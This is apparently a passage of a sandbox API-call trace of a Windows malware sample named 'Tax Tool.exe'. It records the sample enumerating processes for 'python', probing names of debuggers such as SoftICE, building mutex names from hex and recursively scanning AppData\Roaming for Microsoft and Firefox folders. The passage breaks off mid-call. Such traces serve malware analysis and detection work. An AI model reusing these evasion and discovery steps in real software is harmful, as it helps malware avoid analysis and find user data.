th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0056.269] StrStrIW (lpFirst="spoolsv.exe", lpSrch="python") returned 0x0 [0056.269] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.270] StrStrIW (lpFirst="svchost.exe", lpSrch="python") returned 0x0 [0056.270] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x550, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.271] StrStrIW (lpFirst="svchost.exe", lpSrch="python") returned 0x0 [0056.271] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0056.271] StrStrIW (lpFirst="sihost.exe", lpSrch="python") returned 0x0 [0056.271] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.272] StrStrIW (lpFirst="taskhostw.exe", lpSrch="python") returned 0x0 [0056.272] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0056.272] StrStrIW (lpFirst="explorer.exe", lpSrch="python") returned 0x0 [0056.272] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0056.273] StrStrIW (lpFirst="RuntimeBroker.exe", lpSrch="python") returned 0x0 [0056.273] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0056.273] StrStrIW (lpFirst="ShellExperienceHost.exe", lpSrch="python") returned 0x0 [0056.273] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0056.274] StrStrIW (lpFirst="SearchUI.exe", lpSrch="python") returned 0x0 [0056.274] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.275] StrStrIW (lpFirst="svchost.exe", lpSrch="python") returned 0x0 [0056.275] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0056.276] StrStrIW (lpFirst="UsoClient.exe", lpSrch="python") returned 0x0 [0056.276] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.276] StrStrIW (lpFirst="taskhostw.exe", lpSrch="python") returned 0x0 [0056.276] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0056.277] StrStrIW (lpFirst="WMIADAP.exe", lpSrch="python") returned 0x0 [0056.277] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0056.277] StrStrIW (lpFirst="sppsvc.exe", lpSrch="python") returned 0x0 [0056.277] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x718, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.278] StrStrIW (lpFirst="conhost.exe", lpSrch="python") returned 0x0 [0056.278] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0056.279] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="python") returned 0x0 [0056.279] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0056.279] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="python") returned 0x0 [0056.279] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0056.280] StrStrIW (lpFirst="WmiPrvSE.exe", lpSrch="python") returned 0x0 [0056.280] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.280] StrStrIW (lpFirst="dllhost.exe", lpSrch="python") returned 0x0 [0056.281] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0056.281] StrStrIW (lpFirst="audiodg.exe", lpSrch="python") returned 0x0 [0056.281] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.282] StrStrIW (lpFirst="svchost.exe", lpSrch="python") returned 0x0 [0056.282] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.282] StrStrIW (lpFirst="dllhost.exe", lpSrch="python") returned 0x0 [0056.282] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.283] StrStrIW (lpFirst="dllhost.exe", lpSrch="python") returned 0x0 [0056.283] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Tax Tool.exe")) returned 1 [0056.284] StrStrIW (lpFirst="Tax Tool.exe", lpSrch="python") returned 0x0 [0056.284] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.284] StrStrIW (lpFirst="taskhostw.exe", lpSrch="python") returned 0x0 [0056.284] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 0 [0056.285] CloseHandle (hObject=0x1e0) returned 1 [0056.292] CreateFileW (lpFileName="\\\\.\\SICE" (normalized: "sice"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.303] GetLastError () returned 0x2 [0056.313] CreateFileW (lpFileName="\\\\.\\SIWVID" (normalized: "siwvid"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.324] GetLastError () returned 0x2 [0056.331] CreateFileW (lpFileName="\\\\.\\SIWDEBUG" (normalized: "siwdebug"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.344] GetLastError () returned 0x2 [0056.351] CreateFileW (lpFileName="\\\\.\\NTICE" (normalized: "ntice"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.358] GetLastError () returned 0x2 [0056.365] CreateFileW (lpFileName="\\\\.\\REGVXG" (normalized: "regvxg"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.372] GetLastError () returned 0x2 [0056.379] CreateFileW (lpFileName="\\\\.\\FILEVXG" (normalized: "filevxg"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.391] GetLastError () returned 0x2 [0056.398] CreateFileW (lpFileName="\\\\.\\REGSYS" (normalized: "regsys"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.405] GetLastError () returned 0x2 [0056.411] CreateFileW (lpFileName="\\\\.\\FILEM" (normalized: "filem"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.419] GetLastError () returned 0x2 [0056.423] CreateFileW (lpFileName="\\\\.\\TRW" (normalized: "trw"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.429] GetLastError () returned 0x2 [0056.436] CreateFileW (lpFileName="\\\\.\\ICEXT" (normalized: "icext"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.457] GetLastError () returned 0x2 [0056.458] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="4B") returned 2 [0056.458] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="00") returned 2 [0056.458] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="00") returned 2 [0056.458] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="00") returned 2 [0056.458] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="D5") returned 2 [0056.458] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="86") returned 2 [0056.458] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="D2") returned 2 [0056.458] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="D8") returned 2 [0056.459] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="AB") returned 2 [0056.459] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="6E") returned 2 [0056.459] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="07") returned 2 [0056.459] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="EC") returned 2 [0056.459] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="44") returned 2 [0056.459] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="CC") returned 2 [0056.459] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="91") returned 2 [0056.459] wvnsprintfW (in: pszDest=0x9af600, cchDest=6, pszFmt="%02X", arglist=0x9af5dc | out: pszDest="83") returned 2 [0056.459] CreateMutexW (lpMutexAttributes=0x15e89c, bInitialOwner=0, lpName="4B000000D586D2D8AB6E07EC44CC9183") returned 0x1e0 [0056.459] WaitForSingleObject (hHandle=0x1e0, dwMilliseconds=0xffffffff) returned 0x0 [0056.460] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="C0") returned 2 [0056.460] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="00") returned 2 [0056.460] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="00") returned 2 [0056.460] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="00") returned 2 [0056.460] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="84") returned 2 [0056.460] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="4E") returned 2 [0056.460] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="E6") returned 2 [0056.460] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="C4") returned 2 [0056.461] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="06") returned 2 [0056.461] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="48") returned 2 [0056.461] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="47") returned 2 [0056.461] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="0D") returned 2 [0056.461] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="34") returned 2 [0056.461] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="5E") returned 2 [0056.461] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="7B") returned 2 [0056.461] wvnsprintfW (in: pszDest=0x9af660, cchDest=6, pszFmt="%02X", arglist=0x9af63c | out: pszDest="65") returned 2 [0056.461] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="C0000000844EE6C40648470D345E7B65") returned 0x0 [0056.522] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x76486330, lpBuffer=0x9af8ac, nSize=0x6, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x9af8ac*, lpNumberOfBytesRead=0x0) returned 1 [0056.522] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0056.523] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0 [0056.523] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", lpSrch="microsoft") returned 0x0 [0056.524] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", lpSrch="firefox") returned 0x0 [0056.524] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*" [0056.524] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*", lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 0xb07418 [0056.524] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0056.525] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0056.525] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Adobe" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe" [0056.525] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0 [0056.526] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", lpSrch="microsoft") returned 0x0 [0056.526] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", lpSrch="firefox") returned 0x0 [0056.526] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*" [0056.526] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0xb070d8 [0056.527] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 1 [0056.527] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 1 [0056.527] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0056.527] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0 [0056.528] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="microsoft") returned 0x0 [0056.528] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="firefox") returned 0x0 [0056.528] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0056.528] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0xb07158 [0056.528] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0056.528] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 1 [0056.529] PathCombineW (in: pszDest=0x9ad978, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="NativeCache" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0056.529] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned 1 [0056.529] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpSrch="microsoft") returned 0x0 [0056.529] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpSrch="firefox") returned 0x0 [0056.529] PathCombineW (in: pszDest=0x9ad4e0, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*" [0056.529] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0xb07218 [0056.530] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 1 [0056.530] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad6e8 | out: lpFindFileData=0x9ad6e8) returned 0 [0056.530] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0056.530] Sleep (dwMilliseconds=0x0) [0056.536] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9adb80 | out: lpFindFileData=0x9adb80) returned 0 [0056.536] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0056.536] Sleep (dwMilliseconds=0x0) [0056.554] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0 [0056.554] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0056.554] Sleep (dwMilliseconds=0x0) [0056.576] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0056.576] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft" [0056.576] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft") returned 0 [0056.577] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", lpSrch="microsoft") returned="Microsoft" [0056.577] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", lpSrch="firefox") returned 0x0 [0056.577] Sleep (dwMilliseconds=0x0) [0056.579] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0056.579] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Sun" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun" [0056.579] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun") returned 0 [0056.580] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", lpSrch="microsoft") returned 0x0 [0056.580] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", lpSrch="firefox") returned 0x0 [0056.580] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*" [0056.580] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*", lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0xb07158 [0056.580] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 1 [0056.581] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: 